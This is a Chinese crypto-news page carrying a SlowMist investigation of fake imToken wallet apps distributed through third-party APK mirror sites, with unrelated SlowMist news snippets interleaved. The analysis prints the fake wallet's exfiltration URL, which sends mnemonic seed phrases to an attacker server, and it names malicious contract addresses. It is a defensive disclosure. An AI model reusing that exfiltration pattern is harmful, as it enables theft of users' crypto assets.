ETH:慢雾：Web3假钱包第三方源调查分析_apenft币官方最新消息

背景

基于区块链技术的Web3正在驱动下一代技术革命，越来越多的人开始参与到这场加密浪潮中，但Web3与Web2是两个截然不同的世界。Web3世界是一个充满着各种各样的机遇以及危险的黑暗森林，身处Web3世界中，钱包则是进入Web3世界的入口以及通行证。当你通过钱包在Web3世界中探索体验诸多的区块链相关应用和网站的过程中，你会发现在一条公链上每个应用都是使用钱包“登录”；这与我们传统意义上的“登录”不同，在Web2世界中，每个应用之间的账户不全是互通的。但在Web3的世界中，所有应用都是统一使用钱包去进行“登录”，我们可以看到“登录”钱包时显示的不是“LoginwithWallet”，取而代之的是“ConnectWallet”。而钱包是你在Web3世界中的唯一通行证。俗话说高楼之下必有阴影，在如此火热的Web3世界里，钱包作为入口级应用，自然也被黑灰产业链盯上。

慢雾：发现BNB Chain上一恶意合约地址，建议用户快速验证并撤销异常授权:8月20日消息，慢雾在推特发文提醒：请用户检查是否已将资产授权到BNB Chain上的一恶意合约地址：0x75117c9158f53998ce8689B64509EFf4FA10AD80。

该恶意合约尚未通过开源进行验证，但反编译显示其存在针对授权资产的任意转账后门。这种类型的后门让用户钱包在很长一段时间内保持正常使用，但当某天转移一笔金额稍大的资产时，它会突然被盗，而链上不会显示任何最近的异常授权。

用户可使用Revoke.cash和Rabby Wallet进行快速验证并撤销异常授权。以下是与上述合约相关的恶意地址：0xE2A178C2C5C4920C1b2B947A35edDb4f8EcBb7dD、0xB88457b62491CBcEc42203672cFcb4269d64c7e。请用户保持警惕。[2023/8/20 18:11:40]

在Android环境下，由于很多手机不支持GooglePlay或者因为网络问题，很多人会从其他途径下载GooglePlay的应用，比如：apkcombo、apkpure等第三方下载站，这些站点往往标榜自己App是从GooglePlay镜像下载的，但是其真实安全性如何呢？网站分析

慢雾：CoinsPaid、Atomic与Alphapo攻击者或均为朝鲜黑客组织Lazarus:7月26日消息，慢雾发推称，CoinsPaid、Atomic与Alphapo攻击者或均为朝鲜黑客组织Lazarus Group。慢雾表示，TGGMvM开头地址收到了与Alphapo事件有关TJF7md开头地址转入的近1.2亿枚TRX，而TGGMvM开头地址在7月22日时还收到了通过TNMW5i开头和TJ6k7a开头地址转入的来自Coinspaid热钱包的资金。而TNMW5i开头地址则曾收到了来自Atomic攻击者使用地址的资金。[2023/7/26 16:00:16]

鉴于下载途径众多，我们今天以apkcombo为例看看，apkcombo是一个第三方应用市场，它提供的应用据官方说大部分来源于其他正规应用商店，但事实是否真如官方所说呢？我们先看下apkcombo的流量有多大：

慢雾：警惕Web3钱包WalletConnect钓鱼风险:金色财经报道，慢雾安全团队发现 Web3 钱包上关于 WalletConnect 使用不当可能存在被钓鱼的安全风险问题。这个问题存在于使用移动端钱包 App 内置的 DApp Browser + WalletConnect 的场景下。

慢雾发现，部分 Web3 钱包在提供 WalletConnect 支持的时候，没有对 WalletConnect 的交易弹窗要在哪个区域弹出进行限制，因此会在钱包的任意界面弹出签名请求。[2023/4/17 14:08:53]

据数据统计站点similarweb统计，apkcombo站点：全球排名：1,809国家排名：7,370品类排名：168我们可以看到它的影响力和流量都非常大。它默认提供了一款chromeAPK下载插件，我们发现这款插件的用户数达到了10W+：

慢雾: 警惕比特币RBF风险:据BitMEX消息，比特币于区块高度666833出现陈腐区块，并产生了一笔 0.00062063 BTC 的双花交易。根据 BitMEX提供的交易内容来看，双花的两笔交易的nSequence字段的值都小于0xffffffff -1。慢雾安全团队初步认为此次双花交易有可能是比特币中的RBF交易。[2021/1/20 16:38:01]

那么回到我们关注的Web3领域中钱包方向，用户如果从这里下载的钱包应用安全性如何？我们拿知名的imToken钱包为例，其GooglePlay的正规下载途径为：https://play.google.com/store/apps/details?id=im.token.app

由于很多手机不支持GooglePlay或者因为网络问题，很多人会从这里下载GooglePlay的应用。而apkcombo镜像站的下载路径为：https://apkcombo.com/downloader/#package=im.token.app

分析 | 慢雾：韩国交易所 Bithumb XRP 钱包也疑似被黑:Twitter 上有消息称 XRP 地址（rLaHMvsPnPbiNQSjAgY8Tf8953jxQo4vnu）被盗 20,000,000 枚 XRP（价值 $6,000,000），通过慢雾安全团队的进一步分析，疑似攻击者地址（rBKRigtRR2N3dQH9cvWpJ44sTtkHiLcxz1）于 UTC 时间 03/29/2019?13:46 新建并激活，此后开始持续 50 分钟的“盗币”行为。此前慢雾安全团队第一时间披露 Bithumb EOS 钱包（g4ydomrxhege）疑似被黑，损失 3,132,672 枚 EOS，且攻击者在持续洗币。更多细节会继续披露。[2019/3/30]

上图我们可以发现，apkcombo提供的版本为24.9.11，经由imToken确认后，这是一个并不存在的版本！证实这是目前市面上假imToken钱包最多的一个版本。在编写本文时imToken钱包的最新版本为2.11.3，此款钱包的版本号很高，显然是为了伪装成一个最新版本而设置的。如下图，我们在apkcombo上发现，此假钱包版本显示下载量较大，此处的下载量应该是爬取的GooglePlay的下载量信息，安全起见，我们觉得有必要披露这个恶意App的来源，防止更多的人下载到此款假钱包。

同时我们发现类似的下载站还有如：uptodown下载地址：https://imtoken.br.uptodown.com/android

我们发现uptodown任意注册即可发布App，这导致钓鱼的成本变得极低：

钱包分析

在之前我们已经分析过不少假钱包的案例，如：2021-11-24我们披露：《慢雾：假钱包App已致上万人被盗，损失高达十三亿美元》，所以在此不再赘述。我们仅对apkcombo提供版本为24.9.11这款假钱包进行分析，在开始界面创建钱包或导入钱包助记词时，虚假钱包会将助记词等信息发送到钓鱼网站的服务端去，如下图：

根据逆向APK代码和实际分析流量包发现，助记词发送方式：https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>

看下图，最早的“api.funnel.rocks”证书出现在2022-06-03，也就是攻击开始的大概时间：

俗话说一图胜千言，最后我们画一个流程图：

总结

目前这种局活动不仅活跃，甚至有扩大范围的趋势，每天都有新的受害者受。用户作为安全体系最薄弱的环节，应时刻保持怀疑之心，增强安全意识与风险意识，当你使用钱包、交易所时请认准官方下载渠道并从多方进行验证；如果你的钱包从上述镜像站下载，请第一时间转移资产并卸载该软件，必要时可通过官方验证通道核实。同时，如需使用钱包，请务必认准以下主流钱包App官方网址：1/imToken钱包：https://token.im/2/TokenPocket钱包：https://www.tokenpocket.pro/3/TronLink钱包：https://www.tronlink.org/4/比特派钱包：https://bitpie.com/5/MetaMask钱包：https://metamask.io/6/TrustWallet：https://trustwallet.com/请持续关注慢雾安全团队，更多Web3安全风险分析与告警正在路上。致谢：感谢在溯源过程中imToken官方提供的验证支持。由于保密性和隐私性，本文只是冰山一角。慢雾在此建议，用户需加强对安全知识的了解，进一步强化甄别网络钓鱼攻击的能力等，避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。

标签：ETHAPE以太坊COMtogetherbnb手游下载中文版apenft币官方最新消息西格玛币兑换以太坊公告bitpiecom官网下载正版

比特币交易热门资讯